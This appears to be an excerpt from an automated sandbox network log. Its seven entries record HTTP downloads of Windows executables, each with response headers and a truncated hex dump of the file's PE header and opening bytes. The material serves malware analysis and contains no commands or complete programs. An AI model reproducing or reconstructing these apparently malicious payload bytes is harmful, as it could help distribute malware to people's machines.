8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:28 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:29 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:38 GMTContent-Type: application/octet-streamContent-Length: 380456Last-Modified: Mon, 30 Sep 2024 04:37:24 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2b04-5ce28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2f 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9e 05 00 00 08 00 00 00 00 00 00 4e bc 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 bc 05 00 4b 00 00 00 00 c0 05 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 a8 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 c8 ba 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 9c 05 00 00 20 00 00 00 9e 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 c0 05 00 00 06 00 00 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 bc 05 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 aa 05 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 58 f1 31 35 d1 e9 51 1a 14 54 9d 77 7b a3 ef 8c 05 fa a9 ca 06 9a b3 9a d5 76 5e 00 22 df fa eb 06 53 a5 d7 8f ee b6 30 5a 6f bc ef 58 93 ac b7 96 f8 15 7c 83 a1 da 8c c7 f3 b1 bf 6f 88 94 d4 a0 41 53 b4 e8 44 a2 12 a6 6e f0 f4 45 0f 65 b6 f7 e2 35 5f f7 30 1b ba 95 ad ae 45 f9 84 06 03 41 aa 9a 85 ab b7 3b bb fa 01 0c 24 dc 33 a6 5a d8 ba 21 68 3b c7 25 16 bc 0f 0b 72 3b 47 0a 8c 75 18 13 f4 52 80 8b 07 24 27 b9 39 d0 b0 ce f2 c7 56 0b 8b 37 02 4f 3f 14 43 92 dd 3a fb 16 fd b4 7c e9 e5 cd 2c 60 32 76 71 85 32 74 be 58 2f 06 67 3d 5e 6e 28 14 ad dd b4 3f 25 4e 12 c8 d5 d4 67 c6 11 96 51 94 25 a2 25 e1 c9 af 49 72 6f 14 30 e1 06 88 48 09 66 d4 2e 77 2b 5e cf cc f7 63 c7 1d f7 69 9e d9 2f 86 27 c3 ae d5 e9 46 fb 7f fd a9 f0 1d c8 a2 cc 12 46 52 f1 45 fa 74 96 c1 05 9d 2b 76 9c 37 53 8d 67 aa ec 17 33 dc f6 ab 8e da 7d a5 28 c8 b8 c0 a7 48 a1 b2 ba 29 17 75 21 5f 35 fb b1 02 59 62 8e 0a 85 74 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:39 GMTContent-Type: application/octet-streamContent-Length: 414248Last-Modified: Mon, 30 Sep 2024 04:37:16 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2afc-65228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 22 06 00 00 08 00 00 00 00 00 00 4e 40 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 06 00 4b 00 00 00 00 60 06 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 2c 06 00 28 26 00 00 00 80 06 00 0c 00 00 00 c8 3e 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 20 06 00 00 20 00 00 00 22 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 60 06 00 00 06 00 00 00 24 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 06 00 00 02 00 00 00 2a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 06 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 2e 06 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 dc 3b 9f 38 e4 60 f0 c6 77 a2 a5 08 0f e5 a0 19 86 ff d4 8b 72 8b 62 1a 84 93 8a e4 20 c2 ed 43 04 47 41 ba f2 7e 7a 78 46 ae 63 c0 40 51 65 ff b9 38 88 d6 05 c1 93 38 24 d9 ec 61 f5 87 e5 87 93 4e f9 1d 21 51 1e 34 66 b5 13 c6 9a 5c 0e 84 ea 1a b4 64 df 14 61 ad 9e 65 39 34 05 db d7 5e 51 2a 38 66 a9 76 e5 02 07 e4 77 e3 57 1c c6 77 48 09 6b 51 f2 f1 1b 2c d2 db bd 33 c3 41 24 23 b9 e0 d8 50 16 8c 9c e2 87 b4 29 cf f4 53 d0 8b ee 6f 81 91 e8 62 2b 67 59 7f 5c 6f ae 8e b1 f0 d1 35 84 6d e5 29 ea 1d 32 1b 74 cc ab 35 d7 43 a6 c5 26 7a 37 ad 89 9d 1d 2d 8f 44 db 9e d9 c5 b8 71 21 11 b8 d6 8e 1f 8f 6f dc f4 e7 a3 b7 14 ba 07 84 d9 57 32 46 9c cb f4 6e 3b bb ee 7e 8a 39 2e 92 c7 e5 09 71 34 18 6c 9e 56 96 0f c6 4f 0c 70 18 6c dc f5 6d 7d e3 a0 27 d3 c4 cf 3a d1 97 45 b9 f6 cb bd e6 99 2f 25 32 ff fb b7 5f 01 c8 67 05 ca c0 3d 19 37 7f 0a d1 e8 96 f6 cf b7 fa 6d 8b 84 e8 d4 e2 1c dc b6 30 5e 87 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:41 GMTContent-Type: application/octet-streamContent-Length: 334376Last-Modified: Mon, 30 Sep 2024 04:36:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2ae9-51a28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3f 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ea 04 00 00 08 00 00 00 00 00 00 4e 08 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 08 05 00 4b 00 00 00 00 20 05 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 f4 04 00 28 26 00 00 00 40 05 00 0c 00 00 00 c8 06 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 e8 04 00 00 20 00 00 00 ea 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 20 05 00 00 06 00 00 00 ec 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 08 05 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 f6 04 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 da 74 4c 71 2d 7e ec c2 53 dd d7 be 49 a7 c5 39 c2 d8 0b 91 f5 80 f8 a6 ec c6 52 8c bf bc f6 e4 7b ec 64 a2 98 6c 6f f0 35 33 db 20 10 ee 42 c7 4c 66 f8 35 d2 a4 8e 07 62 23 e2 b0 38 46 c0 78 07 c7 69 a2 75 0e 75 65 cd 2b a8 c6 80 d1 ec 28 98 75 79 9f 71 9b ce 9f 7e 81 1a 8d 38 98 7d 23 80 83 9a 83 e5 78 96 52 4e e6 d9 4a b1 81 13 d3 9a 13 f6 d5 14 5f ea 6c 7e 88 a2 32 30 85 9d 8b f0 2c f9 5a ff 45 f9 85 86 dc 23 cd 94 18 e9 69 ce b0 dd c0 8c ef d1 77 e5 48 88 cb 1d f8 08 b0 93 0d 2a fe 0c de 2a 15 86 f0 44 fb c7 b0 a1 1c cd 46 63 0a 08 b7 f1 dc 2f f7 a1 7c 98 2a 1c 77 17 e6 fe f4 d2 6f f9 db 17 c3 32 d5 0d f2 4a b8 ec a1 3c 7f 93 41 28 97 d4 ed 66 83 52 6e da 4a aa 04 11 d4 4a 0f 35 83 a3 cb 3a a3 c2 c2 80 13 00 b2 ff 86 e1 75 e5 48 62 28 24 f2 47 a9 a6 47 09 78 e1 b7 78 21 ba 05 16 c5 4a 2c 98 c4 91 19 69 d1 11 34 ce 1f f6 a3 38 12 5c 47 f5 1f b8 0d eb d4 22 5b 78 1e de 64 f3 11 d8 ce 59 a4 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 